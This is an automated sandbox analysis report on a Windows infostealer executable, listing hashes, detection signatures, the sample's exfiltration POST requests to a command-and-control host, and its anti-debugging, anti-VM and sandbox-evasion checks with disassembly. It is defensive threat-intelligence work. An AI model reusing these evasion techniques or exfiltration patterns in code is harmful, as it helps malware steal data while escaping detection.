
Windows Analysis Report
CMpuGis28l.exe

Overview

General Information

Sample name: CMpuGis28l.exe (renamed because original name is a hash value)
Original sample name: b6aa4b3886f2272b307df8dee7426a4f.exe
Analysis ID: 1578895
MD5: b6aa4b3886f2272b307df8dee7426a4f
SHA1: 8c80da0f5e93622c881e82693715cc81927684fe
SHA256: b571064c090d5a6b22aecf6df5a534bf2481c0d77962369c6c4fb1500c1ad47e
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CMpuGis28l.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\CMpuGis28l.exe" MD5: B6AA4B3886F2272B307DF8DEE7426A4F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: CMpuGis28l.exe | Avira: detected
Source: CMpuGis28l.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: CMpuGis28l.exe | Joe Sandbox ML: detected
Source: CMpuGis28l.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_00FDA5B0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_00FDA7F0
Source: CMpuGis28l.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F7255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_00F7255D
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_00F729FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */* Content-Type: application/json Content-Length: 499685 Data Raw: [hex dump of request body omitted]
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */* Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 98.85.100.80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0103A8C0 recvfrom | 0_2_0103A8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknown | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 Host: home.fivetk5ht.top Accept: */* Content-Type: application/json Content-Length: 499685 Data Raw: [hex dump of request body omitted]
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: CMpuGis28l.exe, 00000000.00000002.2532130951.0000000001C6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851S~
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: CMpuGis28l.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: CMpuGis28l.exe, CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710

System Summary

Source: CMpuGis28l.exe | Static PE information: section name:
Source: CMpuGis28l.exe | Static PE information: section name: .idata
Source: CMpuGis28l.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01D112EB
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F805B0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F86FA0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0103B180
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00FAF100
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_012FE030
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_010400E0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0103C320
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00FD6210
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_01040420
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_012C4410
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_012D6730
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0103C770
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_012F4780
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F7E620
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00FDA7F0
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0102C900
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F7A960
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F84940
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_0122AB2C
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01D12512
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 00FB4FD0 appears 88 times
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 00FB50A0 appears 39 times
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 00F773F0 appears 54 times
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 00FB4F40 appears 141 times
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 00F775A0 appears 246 times
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: String function: 01127220 appears 34 times
Source: CMpuGis28l.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: CMpuGis28l.exe | Static PE information: Section: bxszsxlr ZLIB complexity 0.9944245763752456
Source: CMpuGis28l.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F7255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_00F7255D
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_2_00F729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_00F729FF
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\CMpuGis28l.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: CMpuGis28l.exe | ReversingLabs: Detection: 36%
Source: CMpuGis28l.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: CMpuGis28l.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Section loaded: kernel.appcore.dll
Source: CMpuGis28l.exe | Static file information: File size 4480512 > 1048576
Source: CMpuGis28l.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: CMpuGis28l.exe | Static PE information: Raw size of bxszsxlr is bigger than: 0x100000 < 0x1bd600

Data Obfuscation

Source: C:\Users\user\Desktop\CMpuGis28l.exe | Unpacked PE file: 0.2.CMpuGis28l.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bxszsxlr:EW;ezgbzeah:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bxszsxlr:EW;ezgbzeah:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: CMpuGis28l.exe | Static PE information: real checksum: 0x4470ea should be: 0x446249
Source: CMpuGis28l.exe | Static PE information: section name:
Source: CMpuGis28l.exe | Static PE information: section name: .idata
Source: CMpuGis28l.exe | Static PE information: section name:
Source: CMpuGis28l.exe | Static PE information: section name: bxszsxlr
Source: CMpuGis28l.exe | Static PE information: section name: ezgbzeah
Source: CMpuGis28l.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFC9D8 push ebx; iretd | 0_3_01CFC9DA
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFC9D3 push ebx; iretd | 0_3_01CFC9D6
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF5144 push ecx; iretd | 0_3_01CF5152
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF5140 push ecx; iretd | 0_3_01CF5142
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF5524 push ebp; iretd | 0_3_01CF552A
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFC939 push edx; iretd | 0_3_01CFC93A
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF508C push eax; iretd | 0_3_01CF50AA
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF6098 pushad ; iretd | 0_3_01CF60A2
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF60B1 pushad ; iretd | 0_3_01CF60B2
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF6848 push E2D801CFh; retf 0001h | 0_3_01CF6856
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFCC0C push ecx; iretd | 0_3_01CFCC2A
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFCC2D push ecx; iretd | 0_3_01CFCC2E
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF53C8 push ebx; iretd | 0_3_01CF53D2
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01D06BDC push ss; iretd | 0_3_01D06BDE
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF53DF push ebx; iretd | 0_3_01CF53E2
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01D06BCA push ss; iretd | 0_3_01D06BDA
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF77E0 pushad ; ret | 0_3_01CF77E1
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF9B99 pushfd ; iretd | 0_3_01CF9B9A
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01D06BB7 push ds; iretd | 0_3_01D06BBA
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CF57B8 push edi; iretd | 0_3_01CF57BA
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFCB41 pushad ; iretd | 0_3_01CFCB42
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Code function: 0_3_01CFCB29 pushad ; iretd | 0_3_01CFCB3A
Source: CMpuGis28l.exe | Static PE information: section name: bxszsxlr entropy: 7.955545656668972

Boot Survival

Source: C:\Users\user\Desktop\CMpuGis28l.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\CMpuGis28l.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\CMpuGis28l.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\CMpuGis28l.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 16BB8CF second address: 16BB8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 183A02D second address: 183A031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 183A031 second address: 183A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0034h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 183A04B second address: 183A06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9334DAF99Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 1839186 second address: 1839193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 1839193 second address: 1839197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 1839197 second address: 18391A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 jg 00007F9334BA0026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18391A7 second address: 18391AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18394A4 second address: 18394AE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18394AE second address: 18394B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18394B8 second address: 18394D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9334BA0037h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18394D5 second address: 18394DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 1839675 second address: 1839685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 1839685 second address: 183969C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 183969C second address: 18396AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F9334BA0028h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 18396AF second address: 18396B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe | RDTSC instruction interceptor: First address: 183C316 second address: 183C38A instructions: 0x00000000 rdtsc 0x00000002 js 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F9334BA0028h 0x00000010 popad 0x00000011 xor dword ptr [esp], 15E4C6A1h 0x00000018 mov edi, dword ptr [ebp+12A227AAh] 0x0000001e cmc 0x0000001f push 00000003h 0x00000021 push edx 0x00000022 sub dword ptr [ebp+12A21CEBh], edi 0x00000028 pop ecx 0x00000029 push 00000000h 0x0000002b mov dx, 52D2h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F9334BA0028h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b stc 0x0000004c mov cx, FAA5h 0x00000050 call 00007F9334BA0029h 0x00000055 jmp 00007F9334BA002Ch 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C38A second address: 183C38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C38E second address: 183C394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C394 second address: 183C41A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334DAF9A3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9334DAF9A3h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jc 00007F9334DAF99Eh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jnl 00007F9334DAF996h 0x00000027 pop eax 0x00000028 pop edx 0x00000029 pop eax 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F9334DAF998h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 movzx ecx, di 0x00000047 lea ebx, dword ptr [ebp+12BA3FF7h] 0x0000004d or ecx, dword ptr [ebp+12A22986h] 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C41A second address: 183C42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C42B second address: 183C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
